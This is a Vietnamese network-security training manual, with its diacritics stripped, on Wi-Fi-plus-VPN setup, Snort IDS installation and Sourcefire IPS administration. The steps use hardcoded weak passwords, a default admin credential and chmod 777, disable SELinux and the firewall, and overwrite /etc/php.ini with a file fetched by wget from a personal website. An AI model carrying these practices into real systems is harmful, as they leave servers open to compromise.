Ti liu v Bo mt Version 1 2012

7, 2012

Cu hnh bo mt: - Chn Security Mode l: WPA2 Personal - Chn thut ton m ha cho giao thc WPA l: TKIP+AES - Key khi cc thit b mun kt ni ti mng Wireless ny l: vnexperts.net

Page | 84 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

- SSID ti l VNEXPERTS.NET

Save ton b cc thit lp ti ng t mt my tnh kt ni Wi-Fi ti Access Point ny. Page | 85 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

- Dng chnh cng c trn Windows tm kim cc SSID ca mng Wireless. Ti thy c mng c SSID l VNEXPERTS.NET nhn Connect g key nh va ri vo l hon thnh kt ni Wireless - Nhng sau khi kt ni chc chn bn vn cha truy cp c vo Internet

G Key truy cp

Page | 86 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Hon tt kt ni

Cu hnh trn my ch vWindows Server 2003

Page | 87 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Trong phn trc ca bi vit ti trnh by vi cc bn chi tit v cch thit lp mt my ch Windows Server 2003 thnh my ch VPN Server qua cc bc c bn nht di y: t a ch IP cho 2 card mng ca my ch Enable tnh nng Routing and Remote Access To User v Group cho php Group truy cp VPN To Remote Access Policy cho php cc kt ni VPN Gn a ch IP o cho cc kt ni VPN.

t a ch IP cho hai card mng ca my ch nh di y v da theo hnh u tin ca bi vit ny: - Card ni ra Internet th t Gateway - Card ni vo Internal th khng cn t Gateway

Enable tnh nng Routing and Remote Access Start ri nhn Next ti ca s tip theo chn Custom Configuration chn nh hnh di y: H thng yu cu c bt Service ny khng bn nhn Yes l hon thnh qu trnh

Page | 88 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

To User v Group cho php truy cp VPN - My ch ca ti l Domain Controller (Khng nht thit Nu my ch cha l DC vn to user v Group bnh thng). y ti to user vi tn vnexperts.net password t l 123456

Page | 89 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

- Nhn vo Tab Dial In kim tra nh di y l OK

Page | 90 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Sau to mt Group vi tn VPN ri Add user vnexperts.net vo group ny hon thnh bc ny To Remote Access Policy cho php my ch thnh VPN Server - Mc ch bc ny l cho php mt Group c thc hin mt kt ni VPN. Chut phi vo Remote Access Policy chn New Remote Access Policy

Page | 91 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Chn Custome ri g tn ca Remote Access Policy

Nhn Next h thng s yu cu iu kin cho php kt ni bn nhn Add ri chn ti Windows Group Nhn Add tip add Group m bn cho php thc hin kt ni VPN ti my ch ny.

Page | 92 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Add Group VPN cho php truy cp

Nhn OK tip tc qu trnh - Chn Grant cho php truy cp nhn Next ri Finish

Page | 93 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Gn a ch IP cho nhng kt ni VPN - Chut phi my ch chn Properties - Chuyn sang Tab IP chn Options Static Address Pool - Nhn Add gn di a ch IP cho cc kt ni VPN ti ti chn di 10.69.69.200 - 10.69.69.250 gn cho cc my truy cp VPN ti my ch ny.

Page | 94 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Nhn OK hon thnh ton b qu trnh cu hnh trn my ch Routing and Remote Access. c. To kt ni VPN t cc thit b truy cp qua Wifi - Bc 1 va ri bn kt ni thnh cng ti mt mng WiFi nu khng s dng gii php VPN th Access Point ca bn cm trc tip vo Modem ADSL l cc kt ni c th truy cp ti Internet. Nhng nh vy s khng bo mt do mi m ha mt ln vi giao thc WPA v s dng thut ton AES-TKIP. y bn c th s dng phng thc m ha WEP h tr cho cc kt ni khng h tr giao thc WPA - Trong gii php ny sau khi kt ni WiFi bn phi kt ni VPN na mi c th truy cp c ra Internet. Vi ng dng VPN s dng m ha hai ln cho mt gi tin, ln 1 m ha vi WPA ln 2 m ha tng IP vi PPTP hoc IPsec Page | 95 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

- To kt ni VPN cho my kt ni Wi-Fi Thc hin vi Windows XP Professional - Start / Control Panel / Network Connections / Chn New Connection Wirard Ca s u tin nhn Next tip tc qu trnh.

Chn s dng kt ni VPN, nhn Next tip tc qu trnh

Page | 96 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

La chn VPN connections

Chn tn cho kt ni ti chn VNEXPERTS.NET

Page | 97 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

a ch IP ca my ch VPN Server ti g a ch 192.168.50.1 la a ch ca my ch VPN Server va ri ti cu hnh. Nhn Next hon thnh qu trnh

Hon thnh qu trnh to mt kt ni VPN trn my tnh kt ni WiFi

Page | 98 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Kt ni - Nhn dp vo kt ni ti va to g User vnexperts.net nm trong Group VPN c php kt ni VPN ti my ch VPN: 192.168.50.1 / Nhn Connect

Qu trnh Xc thc

Page | 99 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Kim tra Truy cp vo trang web: vnexperts.net v kt qu tht tuyt vi

Trong bi vit ny ti gii thiu vi cc bn mt gii php Bo mt cc kt ni Wi-Fi. Khi mt h thng bao gm cc my ch vi d liu ht sc quan trng nhiu doanh nghip khng gim trin khai s dng gii php Wireless. Nhng vi ng dng VPN vo cc kt ni Wireless hon ton bn c th tin tng c bi h thng c m ha hai tng. 10. H thng pht hin v ngn chn truy cp bt hp php IDS/IPS a. Nguyn l phn tch gi tin Khi gi tin i vo thit b Sourcefire s c x l qua cc bc:

Page | 100 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Khi gi tin c capture bi thit b Sourcefire gi tin s c: - Decode bi thnh phn Decoders ca Sourcefire Sau gi tin s c chuyn vo qu trnh Preprocessors Gi tin s c so snh vi tp Rules c s dng Qu trnh s a ra c mt c s d liu v cc Event Cc Event c th c lc ra thnh cc dng Event khc nhau. T cc Event c pht sinh s c thc hin lm mt s tc v khc.

Hiu v qu trnh phn tch traffic network

Page | 101 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Event s c ni dung:

Note: Impact Flag l tnh nng kt hp gia IPS v RNA cho php nh gi mc ri ro ca cuc tn cng. Mc nguy him nht l Flag 1, tip theo l 2,3,4 mc t ri ro nht l mc Flag 1. Qu trnh x l gi tin v Decoding

Page | 102 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Qu trnh ny s Decode gi tin t Layer 2

Sau khi Decode thit b Sourcefire s thc hin tip qu trnh Preprocessors v so snh vi tp Rules

Cc Event s c to ra t cc qu trnh

Page | 103 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

a. Ci t v cu hnh Snort lm IDS/IPS

Prepare install L bc chun b h iu hnh, cc th vin, v b ci Install L bc tin hnh ci t, cu hnh cc dch v lin quan v snort. NOTE_1: Bt my a Fedora Core 10, vo snapshot v Orgin. ng nhp vo Fedora vi user: root v password: yeuemnhieu NOTE_2: c k tng dng, dng no c du "#" u l ch minh ha cn dng khng c du # l cu lnh. NOTE_3: Dng no l ch in nghing l command line cn phi chy NOTE_4: Sau khi logon hoc khi ng li phi t a ch IP vi cu lnh: ifconfig eth0 192.168.0.x/24 route add default gw 192.168.0.1 echo "nameserver 208.67.222.222" > /etc/resolv.conf Page | 104 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Nu khng c eth0 th s dng eth1 Prepare Install Update OS bng cu lnh: yum install update Ci t cc th vin cho Snort yum install iptables-devel libpcap libpcap-devel pcre pcre-devel pcre-lib php phpcommon php-gd php-cli php-mysql flex bison mysql mysql-devel mysql-bench mysql-server gcc gcc-c++ To th mc cha Snort trong h thng mkdir /etc/snort mkdir /etc/snort/log Copy cc b ci ln th mc /root/Desktop Cc b ci l: Snort-2.8.5.tar.gz, Snortrule...tar.gz; base-1.4.4.tar.gz, adodb vao thu muc /root/Desktop. Nu logon c trn Desktop ri th ok

Page | 105 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Ci t Snort SELinux Disable SELinux l dch v tng t nh UAC trn windows, thc hin t ng nhiu cu lnh mt lc yu cu cn phi Disable tnh nng ny ca Fedora. ---> Vo System --> adminstration --> SELinux Management ri disable lm theo cc bc di y: - disable SElinux - restart lai may tinh - kiem tra SElinux OK - dat dia chi IP Service ci t Snort cn phi tt v bt mt s Service, v d nh IPTABLES nu Enable th s khng capture c d liu th sao lm IDS c. Cc Service cn phi lm l: - Stop iptables - start mysqld - start httpd Cu lnh cu hnh cc dch v ny l: /etc/init.d/iptables stop /etc/init.d/mysqld restart /etc/init.d/httpd restart Install Snort Page | 106 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Gii nn v ci t snort Ci t Snort vi cu lnh di y: cd /root/Desktop tar xzvf snort-2.8.5.tar.gz cd snort-2.8.5 ./configure --with-mysql && make && make install cd /etc/snort tar xzvf /root/Desktop/snortrules-snapshot-CURRENT.tar.gz Cu hnh Snort Vo th mc /etc/snort/etc copy tt c cc file ra ngoi th mc /etc/snort Cu hnh file /etc/snort/snort.conf: - Nhn p vo file s ra giao din Texteditor edit file vo: + Dng th 194 cu hnh: path rule l /etc/snort/rules + Dng th 259,260: Thm du # vo u dng (Snort free ch h tr 1 Detection Option) + Dng th 829: B du # u dng. Thit lp: user snort; passoword snort; database l snort; host l localhost (Dng ny cu hnh user ng nhp vo MYSQL cho snort). Ci t v cu hnh Database Mysql (user root cua toi password=123456) Cu lnh cu hnh MYSQL: mysql grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to snort@localhost; SET PASSWORD FOR snort@localhost=PASSWORD('snort'); Page | 107 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to root@localhost; SET PASSWORD FOR root@localhost=PASSWORD('123456'); create database snort; quit cd /root/Desktop/snort-2.8.5/schemas mysql -p < create_mysql snort Khi xut hin yu cu nhp password g: 123456 ri enter Ci t BASE v ADODB ADODB l dch v mc d liu t MYSQL ra, BASE l Web APP hin th d liu ca ADODB. Cu lnh ci t: cd /var/www/html tar xzvf /root/Desktop/base-1.4.4.tar.gz cd /var/www/html/base-1.4.4 tar xzvf /root/Desktop/adodb4991.gz chmod 777 /var/www/html/base-1.4.4/ chown /var/www/html/base-1.4.4/ chown apache /var/www/html/base-1.4.4/ chgrp apache /var/www/html/base-1.4.4/ /etc/init.d/httpd restart

Page | 108 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Truy cap cau hinh BASE qua web - Chnh sa file /etc/php.ini + File php.ini l file cu hnh ca PHP, mc nh file ny b li nn phi xa i v download li bng cc cu lnh di y: rm /etc/php.ini -f cd /etc wget http://tocbatdat.googlepages.com/php.ini + Sau khi download vo th mc /etc file php.ini s b thay i tn nn chng ta cn phi thay i li v php.ini + Khi ng li dch v web vi cu lnh: /etc/init.d/httpd restart - Cu hnh Base + Vo firefox: http://localhost/base-1.4.4 Bc 1: Nhn continue tip tc Bc 2: cu hnh Path ca ADODB: /var/www/html/base-1.4.4/adodb Bc 3: cu hnh user ng nhp vo SQL: Database: Host: User: Pass: snort Localhost snort Snort

Bc 4: Cu hnh User qun tr l: User: snort; password: snort Page | 109 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

Bc 5: Create BASE Bc 6: OK - cau hinh tu buoc 1 -> 5 Run SNORT test snort chy hay khng chng ta download mt file exploit.rule t website ca mnh v bng cu lnh di y: Lu download xong phi vo th mc i tn file: rm /etc/snort/rules/exploit.rules -f cd /etc/snort/rules wget http://tocbatdat.googlepages.com/exploit.rules Sau khi download file exploit.rules b thay i tn nn chng ta cn phi thay i li v php.ini Sau khi i tn tin hnh chy Snort bng cu lnh: snort -v -c /etc/snort/snort.conf -l /etc/snort/log 5. View v Test kt qu Dng Firefox truy cp a ch: http://localhost/base-1.4.4 Th ping ra ngoi vi gi tin ln hn 800 bng cu lnh ping 192.168.0.1 -s 888 Troubleshooting Nu khng chy c Snort: 1. Xem li cc NOTE. 2 th kim tra li t Phn 1-5 ca phn II ci t SNORT: Page | 110 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

11. Ci t v cu hnh Sourcefire IPS a. Tnh nng ca h thng IPS Sourcefire Thit k h thng IPS gip pht hin v ngn nga cc cuc tn cng, cc nguy c tim n v an ton bo mt thng tin t bn ngoi vo vng DMZ hoc Server Frame ca VNPT H Ni Tnh nng RNA b xung cho IPS/IDS cung cp tnh nng Network profile (OS, Services, Open Ports, Vulnerability, Host static). T kt hp vi IPS/IDS t ng cu hnh, tinh chnh Rules Yu cu tnh nng c th v h thng IPS ti VNPT H Ni STT Tnh nng M t Pht hin cc cuc tn cng t bn ngoi nh Worms, Trojans, Buffer overflows, DoS attacks, Backdoor attacks, Spyware, Port scans, VoIP attacks, IPv6 attacks, Statistical anomalies, Protocol anomalies, P2P attacks, Blended threats, Zero-day attacks vo cc server dch v C th xc lp cc qui tc ngn chn cc cuc tn cng hoc xc lp ch t ng tinh chnh ty theo cc dch v a ra cc bo co v cc cuc tn cng, cc l hng bo mt Pht hin v a ra cc bo co v cc cuc tn cng, cc nguy c bo mt, l hng an ninh ca cc server, dch v ca cc VLAN gim st. Pht hin cc cuc tn cng, cc nguy c bo mt t ngi dng Trong trng hp xy ra tn cng t ngoi vo cc host trong vng gim st th c th thit lp tnh nng IPS trn thit b bo v cc host ngn chn tn cng t bn ngoi vo cc vng

Tnh nng IPS bo v cc vng mng

Tnh nng IDS pht hin cc cuc tn cng cho cc VLAN thit lp gim st.

Page | 111 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

STT

Tnh nng Tnh nng gim st cnh bo tc thi (Real time Network Awarreness RNA)

M t RNA gip pht hin cc nguy c an ninh mng:Network profile (OS, Services, Open Ports, Vulnerability, Host static). RNA kt hp vi IPS, IDS t ng active/disable cc rules cn thit bo v h thng mng. Tnh nng Passive Scan cho php RNA pht hin nguy c an ninh h thng mng m khng nh hng ti nng lc h thng mng a ra nhng cnh bo nhng vi phm v chnh sch bo mt.Nhng vi phm ny c th l: mt cuc tn cng nguy him xy ra, mt s c lin quan ti mt my ch hay mt dch v. Cnh bo c th thc hin qua Email, SNMP hay SYSLOG.

IT Policy complicance

Page | 112 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

b. M hnh trin khai in hnh h thng IDS/IPS

Phn tch m hnh in hnh ca Sourcefire Sourcefire c hai dng sn phm, Sourcefire Defense Center l thit b qun l tp trung, Sourcefire 3D Sensor l dng thit b Sensor cung cp cc tnh nng IPS/IDS. Sourcefire Khi trin khai vo h thng c th hot ng Inline (IPS) hoc Passive (IDS), c th pht hin v ngn chn cc cuc tn cng hay cc nguy c an ninh mng. Cc Event ca cc Sensor s c chuyn v thit b qun l tp trung.

Page | 113 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

c. Nguyn l hot ng ca h thng IDS/IPS Sourcefire Nguyn l chung

S thnh phn & nguyn l hot ng

Gii thch nguyn l hot ng v cc thnh phn ca thit b SourceFire sensor qua v d sau: Thit b SourceFire 3D Sensor 3D3500c 8 cng Ethernet lm nhim v Sensing: Interface Sets: + Cc cng ny c nhm vo cc Interface Sets khc nhau. Trn hnh vi 3 Interface Sets c to

Page | 114 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

+ Interface Sets c to ra c hai mode Passive v Inline (Inline v Inline with Fail Open) Detection Engine: lm nhim v thc thi Monitoring trn Interface Sets (nh nhng ngi gc cng). trn hnh c hai Detection Engine c to v thc thi nhim v Monitoring trn cc Interface Sets. C 3 loi Detection Engine l: IPS, RNA, RUA Policy: L chnh sch p dng cho cc loi Detection Engine. Intrusion Policy p dng cho IPS Detection Engine, Detection Policy p dng cho RNA.

Page | 115 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

7, 2012

S gii thch nguyn l hot ng ca IDS/IPS Sourcefire.

Page | 116 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Step 1: Cc port sensing trn thit b Sourcefire 3D Sensor c nhm li thnh: Interface Sets. M hnh trn l to ra Interface Sets dng Inline mode. Step 2: Trn cc interface sets ny to ra cc Detection Engine vi chc nng gim st. Step 3: cc Detection Engine hot ng cn phi xy dng chnh sch thit lp p dng cho cc Detection Engine ny. Step 4: Khi Detection Engine c cc hnh ng block traffic hay pht hin ra cc nguy c an ninh s a ra cc Event. d. Thit lp cc thng s qun tr cho cc thit b Sourcefire Cm cable qun tr cho cc thit b Trn cc thit b Sourcefire Sensor 3D cng qun tr l cng Eth1 nm pha sau thit b. Trn thit b Sourcefire DC cng qun tr l cng Eth1 nm pha sau thit b Cable qun tr c nh du r rng v cn phi chun b trc khi tin hnh lp t thit b Chun b cc Cable cm vo cc port sensing nh trong m hnh trin khai phn trn. Thit lp cc thng s c bn cho thit b Sourcefire + t tn cho thit b theo ng quy hoch ca VNPT HN. + a ch IP + Password qun tr a ch IP mc nh ca thit b l: 192.168.45.45, truy cp thit b qua giao din web: bng cch https://192.168.45.45 User:admin v Password: Sourcefire Giao din ln u tin ng nhp cho php chng ta thit lp li cc thng s c bn cho thit b Sourcefire

Page | 117 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

e. Upgrade cho cc thit b Sourcefire Sourcefire cho php Update t ng hoc do ngi qun tr upload gi update download t trang support ca Sourcefire (Ngi qun tr c th yu cu nh phn phi cung cp cc bn cp nht ny, Account ng nhp vo trang support ch cung cp khi khch hng tham gia v c chng ch v kha hc do hng Sourcefire cung cp).

f. Cu hnh cc thit lp h thng (System settings) y l phn thit lp chung nht v h thng cho thit b Sourcefire nh cu hnh: a ch IP, Time, License, shutdown/restart vn hnh v qun tr h thng Sourcefire IPS cn phi bit kim tra cc thng tin h thng cho ng vi thit k, thay i cc thit lp h thng cho ph hp vi yu cu t ra. Ngi qun tr v vn hnh h thng Sourcefire IPS cn phi gim st v c th thay i mt s thng tin h thng di y:

Information L thng tin chung nht v thit b Sourcefire.

Page | 118 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Tn thit b, Model, Version, a ch IP. Quan trng l cho bit cc Policy c p dng cho thit b. Cho php ngi qun tr thay i tn ca thit b

License L mc xem v qun l License cho thit b Sourcefire

Page | 119 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Network Cho php ngi qun tr xem v thit lp IP, DNS, Proxy, Hostname cho thit b Sourcefire. Mi thit b Sourcefire trin khai ti VNPT H Ni s c t a ch IP, Tn thit b

Network Interface Cho php ngi qun tr thit lp cng qun tr

Page | 120 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Process Ngi qun tr c th truy cp vo mc process a ra cc lnh nh: Shutdown, Reboot hoc Restart thit b Sourcefire

Remote Management Ngi qun tr c th thc hin vic qun l tp trung cc thit b ca Sourcefire theo ng nh ti liu thit k: Thit b DC1500 qun l 2 thit b Sensor 3D3500 Cc thit b lm vic vi nhau thng qua + IP + Port (Ngi qun tr cu hnh) + Key (ngi qun tr thit lp dng Preshare key) Cc bc cu hnh chi tit ngi qun tr c th xem ti ti liu trin khai

Time Cho php thit lp thi gian cho thit b Ngoi ra cn c mt s thit lp khc nh netflow device, Storage, Heath blacklist

Page | 121 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

g. Thit lp qun tr tp trung cho cc thit b Sourcefire Gii php Sourcefire s dng thit b Sourcefire DC qun l cc thit b Sourcefire 3D Sensor. Ton b mi thit lp trn Sourcefire 3D Sensor u c th thc hin trn thit b Sourcefire DC. Ti VNPT H Ni sau khi thc hin thit lp qun l tp trung cho cc thit b Sourcefire, mi cu hnh s c thc hin trn thit b Sourcefire DC1500. M hnh qun tr tp trung ca Sourcefire
Management VLAN Sourcefire 3D3500 Sensor

Mgt_port

Mgt_port Sourcefire DC1500 Switch Mgt_port Sourcefire 3D3500 Sensor

Thit b Sourcefire DC1500 lm vai tr qun l cc thit b Sourcefire trong h thng Thit b Sourcefire 3D Sensor lm nhim v Sensing v chu s qun l bi thit b Sourcefire DC1500 Cc bc tin hnh cu hnh Vic cu hnh qun tr tp trung trn cc thit b Sourcefire cn phi thc hin trn c hai thit b Sourcefire DC v Sourcefire 3D Sensor. Trn Sourcefire 3D Sensor phi thit lp chu s qun l ca thit b DC no da vo (IP, Port, Registration Key). Trn thit b Sourcefire DC phi thit lp thm Sensor da vo (IP, Port, Registration Key). Thc hin trn thit b 3D Sensor + Truy cp vo cc thit b Sourcefire 3D Sensor Operations System Settings Remote Management Add Manager. (port qun tr mc nh l 8305) + Thit lp a ch IP ca thit b qun tr l DC1500: 10.10.42.120 Page | 122 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

+ Thit lp Registration Key (key bo mt gia cc thit b): vthn123 + Nhn Save. Thc hin tng t trn c 3 thit b Sourcefire 3D Sensor

Thc hin trn thit b Sourcefire DC1000 Truy cp vo thit b DC1000 Operations Sensor Nhp a ch IP ca thit b 3D Sensor vo mc Host, registration key l: vthn123 ri nhn add

Page | 123 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Sau khi hon tt qu trnh thit lp qun l cc thit b c th vo thit b DC1500 Operations Sensor xem cc thit b c qun l. ( y v d l mt thit b DC qun l 3 thit b 3D Sensor)

h. Cu hnh Interface Sets v Detection Engine. Cu hnh Interface Sets Interface Sets l nhm cc Port Sensing trn thit b Sourcefire 3D Sensor. Ngi qun tr c th nhm cc Interface li thnh mt Interface Sets. Interface Sets c cc dng nh: + Passive thc hin hot ng IDS + Inline Thc hin hot ng nh IPS + Inline With Fail-Open Thc hin nh IPS nhng khi thit b li h thng mng khng b gin on. Trn DC1500 thc hin: Operations Detection Engine Interface Sets. La chn tn, loi v to ra trn thit b Sourcefire 3D Sensor no.

Page | 124 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Cu hnh Detection Engine C 3 Loi Detection Engine: IPS, RNA, RUA. Do VNPT H Ni ch mua license IPS v RNA nn ch c th to ra 2 loi detection engine ny. + IPS Detection Engine cho php pht hin v ngn chn cc cuc tn cng mng + RNA cho to ra Network Profile + RUA cho php pht hin v map hai yu t IP User vi nhau. Mi Interface Sets c th to ra nhiu loi Detection Engine gim st. Detection Engine l cc engine c chc nng gim st trn Interface Sets, ngi qun tr c th gim st xem cc Detection Engine c p dng ng trn cc Interface Sets hay cha. Detection Engine c th c ngi qun tr thay i

Page | 125 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Giao din thay i Detection Engine p dng cho cc Interface Sets

Page | 126 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

i. Qun tr v thit lp chnh sch cho IPS y l phn rt quan trng trong vic qun tr v vn hnh thit b Sourcefire IPS. Ton b vic thit lp chnh sch cho Detection Engine u c thc hin ti mc ny. Ngi qun tr c th to ra cc chnh sch bo mt, khi c mt vi phm bo mt s a ra nhng hnh ng ph hp vi vi phm ny.

Trong phn qun tr cc thit lp v chnh sch c cc mc chnh sau: Qun tr IPS Qun tr RNA Qun tr chnh sch bo mt

Page | 127 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Qun tr IPS Qun tr IPS bao gm vic thit lp chnh sch cho cc Detection Engine, qun l cc Rules, qun l update SEU v mt s tnh nng khc

Qun tr Intrusion Policy Intrusion Policy l chnh sch c p dng cho mt hoc nhiu Detection Engine. Intrusion policy thit lp cc thng s: + Tn ca Policy + Base Policy c p dng (c 3 mc : u tin kt ni hn bo mt, cn bng kt ni v bo mt, u tin bo mt hn kt ni). Ti VNPT H Nikhuyn co s dng mc bo mt cn bng. + Policy ny c p dng cho thit b Sensor no hay Detection Engine no chu nh hng trc tip t chnh sch nay. + Ti Policy ny vi bao nhiu Rule cu hnh Enable v c bao nhiu Rule ch : Ch cnh bo (Generate Events) v ngn chn/cnh bo (Drop and generate event). Di y l thng tin chung ca mt Intrusion Policy p dng cho Detection Engine vng DMZ ca VNPT H Ni

Page | 128 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ngi qun tr c th qun l mc bo mt da trn cc khuyn co t hng vi ba mc : + (High) Security over connectivity; (Lower) Connectivity over security; v (Normal) balanced security and connectivity

Page | 129 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ngi qun tr c th xem v thay i cc Detection Engine chu chnh sch ny. Vi hnh di th hin Policy ny p dng cho mt Detection Engine l vng DMZ ca VNPT H Ni

Ngi qun tr c th tinh chnh cc bin cho cc rules hot ng mt cch hiu qu nht t cc thay i va nh ngha mi Variable: V nh nu dch v HTTP s dng thm cng 443 chng ta s thm cng 443 vo mc HTTP_PORTS

Page | 130 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ton b rule ca Sourcefire l khong trn 20.000 Rules uc update thng xuyn qua vic Import SEU t ng t Sourcefire. Mi Policy Intrusion p dng cho mi Detection Engine chng ta c th p dng nhng Rules c Enable/Disable khc nhau. Ngoi cc rule c enable v disable mc nh ngi qun tr cn phn tch tnh hnh c th bt tt cc rule sao cho p ng yu cu v bo mt ca h thng.

Khi s dng tnh nng RNA pht hin h thng mng (Host active, OS, Service, IP, MAC, Vulnerability). Th thit b Sourcefire c th s dng kt qu ny thay i trng thi cc Rules nng cao hiu nng x l thit b, gim thiu cc Event khng quan trng. Chng ta c th s dng RNA recommend trng thi cc Rules

Page | 131 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ngoi ra policy ny c th c p dng cho mt di mng

Advanced Settings cho Intrusion policy l phn thit lp quan trng i hi ngi qun tr phi hiu bit su v h thng Sourcefire trc khi cu hnh trnh nh hng ti h thng. Mc nh trong phn Advanced Settings ny hng cu hnh mc nh

Page | 132 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Policy Layers cho php mt h thng c nhiu Layer: + Layer mc nh c khuyn co t hng + Layer c thay i bi ngi dng

Sau mt lot cc thit lp ngi qun tr cn phi Commit Changes ng v lu cu hnh cho Intrusion policy. Page | 133 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Sau khi lu Intrusion Policy ngi qun tr cn phi Apply policy cho cc Detection Engines, sau khi apply cn phi kim tra qu trnh c thc hin thnh cng hay khng

Page | 134 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

SEU y l giao din gim st SEU c p dng vo Intrusion Policy Ngoi ra ngi qun tr c th Update SEU cho thit b Sourcefire bng cch download SEU t trang web Sourcefire ri Import vo thit b

Rule Editor Mc nh Sourcefire c khong trn 20.000 Rules nhng ngi qun tr hon ton c th thm cc Rule mi vo m bo cc chnh sch bo mt cho h thng ca mnh. Trong giao din qun tr Rule Editor ngi qun tr c thm xem ni dung, sa ni dng ca rule vi cc thit lp c th, cho php qun l Rule.

Page | 135 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

V d ti VNPT H Ni thm mt rule khng cho Ping gi tin ln hn 800 Byte, bi nhng gi Ping ln c th gy nh hng ti h thng mng

Page | 136 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Email alert Khi nhng rule c match th th thit b Sourcefire s gi cnh bo ti ngi qun tr. Ngi qun tr c th s dng tnh nng Email Alert hoc s dng chnh sch Compliance Policy

Page | 137 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Qun tr RNA RNA l mt tnh nng cao cp ca Sourcefire cho php pht hin h thng mng bng phng thc Passive Scan thc hin 24/7. Qun tr RNA chng ta cn thit lp cc mc di y:

Detection Policy Detection Policy l chnh sch c p dng cho cc RNA Detection Engine. Ngi qun tr cn phai to ra chnh sch ny p dng cho cc RNA Detection Engin nhm pht hin h thng mng. Giao din qun tr cc Detection Engine

Ngi qun tr c th tinh chnh cho RNA Detection Engine qua vic cu hnh Detection Policy Di y l giao din qun tr v cc thit lp c thc hin trong phn trin khai thit b Sourcefire

Page | 138 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Host Atributes t cho mt vng mng Ti VNPT H Ni t tn l VNPT Ha Noi v kt hp vi Network Map mt tnh nng ca RNA Network Map Netowrk Map cho php ngi qun tr bit c h thng mng vi cc thng tin: + Host Active: c phn theo cc gii mng khc nhau + OS: Chi tit v h iu hnh

Page | 139 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

+ Cc dch v hot ng trn Host + Cc ng dng + Cc giao thc s dng + V l hng bo mt ca h thng y l giao din qun tr Sourcefire vi tnh nng RNA Netowrk Map vi a ch IP 172.29.1.18

Page | 140 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

RNA Detector Ngi qun tr c th cu hnh RNA Detector enable hay Disable cc thit lp ca RNA Services hot ng trong h thng mng Ngi qun tr c th vo RNA Services pht hin xem h thng ang chy nhng Services g v nhng Services ang hot ng trn my no

Chi tit Serices

Page | 141 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Chi tit service HTTP vi Vendor l YTS

Qun tr ng dng chy trn h thng mng Ngi qun tr c th da vo tnh nng RNA Application kim tra cc ng dng hot ng trong h thng mng Page | 142 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

